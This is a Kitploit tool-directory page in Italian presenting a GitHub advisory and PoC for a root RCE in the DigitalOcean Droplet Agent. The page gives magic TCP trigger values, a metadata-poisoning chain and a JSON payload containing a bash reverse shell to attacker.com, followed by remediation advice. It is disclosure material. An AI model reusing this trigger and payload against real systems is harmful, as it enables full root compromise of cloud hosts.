Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24516-DigitalOcean-RCE. — Analisi tecnica e PoC per CVE-2026-24516: esecuzione di codice in modalità remota come root non autenticata in DigitalOcean Droplet Agent (CVSS 10.0). | Kitploit
Strumenti/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce.
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitSicurezza CloudPaper e Ricerca

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Red Teaming
Sviluppo Payload
GitHubpoxsky/cve-2026-24516-digitalocean-rce.

CVE-2026-24516-DigitalOcean-RCE.

Analisi tecnica e PoC per CVE-2026-24516: esecuzione di codice in modalità remota come root non autenticata in DigitalOcean Droplet Agent (CVSS 10.0).

Vedi Repository
6 mesi faNon ancora revisionato

CVE-2026-24516-DigitalOcean-RCE.

Analisi tecnica e PoC per CVE-2026-24516: Remote Code Execution Root non autenticato in DigitalOcean Droplet Agent (CVSS 10.0).

AVVISO DI SICUREZZA TECNICO: CVE-2026-24516

ID: CVE-2026-24516

TITOLO: RCE Root non autenticato tramite Metadata Poisoning e Side-Channel

GRAVITÀ: Critica (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

RICERCATORE: Anmol Singh Rajput (@poxsky)

AFFETTI: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2

================================================================================

  1. PANORAMICA ARCHITETTURALE

Il 'droplet-agent' è un demone di sistema privilegiato (UID 0) progettato per la telemetria e la diagnostica remota. Mantiene uno stato di monitoraggio passivo finché non viene ricevuta una specifica sequenza di segnalazione. La vulnerabilità principale risiede nel "Modello di Fiducia Implicita" del servizio di metadati link-local (169.254.169.254), che manca di controlli di integrità crittografica.

  1. APPROFONDIMENTO: PRIMITIVE DI EXPLOIT

A. SIDE-CHANNEL TCP PASSIVO (IL LIVELLO DI SEGNALAZIONE) L'agente utilizza un listener raw socket (internal/metadata/watcher/ssh_watcher.go) sulla Porta 22. Esegue la transizione di stato da IDLE ad ACTIVE in base a costanti magiche hardcoded nell'header TCP:

  • Sequence Number (Seq): 0x419AD37 (68796879 -> "DODO")
  • Acknowledgment Number (Ack): 0xCF259 (848489 -> "TTY")

Analisi: Questo crea un trigger deterministico. Un attaccante esterno può impersonare il control plane dell'infrastruttura spoofando un singolo pacchetto TCP SYN con questi valori magici.

B. VIOLAZIONE DEL CONFINE DI FIDUCIA (IL FLAW LINK-LOCAL) Alla segnalazione, l'agente recupera istruzioni JSON dall'endpoint dei metadati cloud. La vulnerabilità è una Mancanza di Verifica dell'Autenticità. L'agente tratta la zona 169.254.169.254 come una "Zona Fidata Rinforzata", omettendo di verificare le firme del payload (HMAC/mTLS).

C. IL SINK: INIEZIONE DI COMANDI NON SANIFICATA Il 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) contiene un sink in cui analizza l'array 'requesting'.

  • Sink Vulnerabile: exec.CommandContext(ctx, name, args...)
  • Flaw Logico: La logica di validazione esegue solo un controllo di prefisso ('command:'). Non riesce a tokenizzare gli input o a sanificare i metacaratteri della shell (;, |, &, $).
  1. CATENA DI ATTACCO ARMATA (SSRF-TO-ROOT-RCE)

  1. IMPERSONIFICAZIONE: L'attaccante identifica un SSRF in un'applicazione ospitata per inoltrare richieste al servizio di metadati link-local.

  2. AVVELENAMENTO: L'attaccante configura un server di metadati malevolo che restituisce: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}

  3. IL COLPO: L'attaccante invia il trigger TCP "DODO-TTY" alla Porta 22.

  4. ESECUZIONE: L'agente recupera il JSON avvelenato ed esegue la reverse shell con UID EFFETTIVO 0 (Root).

  5. VALUTAZIONE DELL'IMPATTO


  • COMPROMISSIONE TOTALE DEL SISTEMA: Accesso completo a livello kernel.
  • PERSISTENZA: Capacità di iniettare rootkit o backdoor SSH persistenti.
  • RISCHIO TENANT: Un singolo SSRF in qualsiasi app cliente porta a una compromissione completa del droplet, aggirando tutti i firewall a livello OS.
  1. STRATEGIA DI REMEDIATION

  • INTEGRITÀ CRITTOGRAFICA: Implementare la firma JWT/HMAC per tutti i payload dei metadati.
  • ISOLAMENTO DEL NAMESPACE: Eseguire l'actioner in un namespace PID/Network ristretto.
  • ALLOWLISTING: Hardcodare un set di binari diagnostici immutabili; rifiutare tutti gli input stringa dinamici.
1000071250 1000071254 1000071252 1000071246 1000071243 1000071244 1000071247 1000071249 1000071251
Scarica lo strumento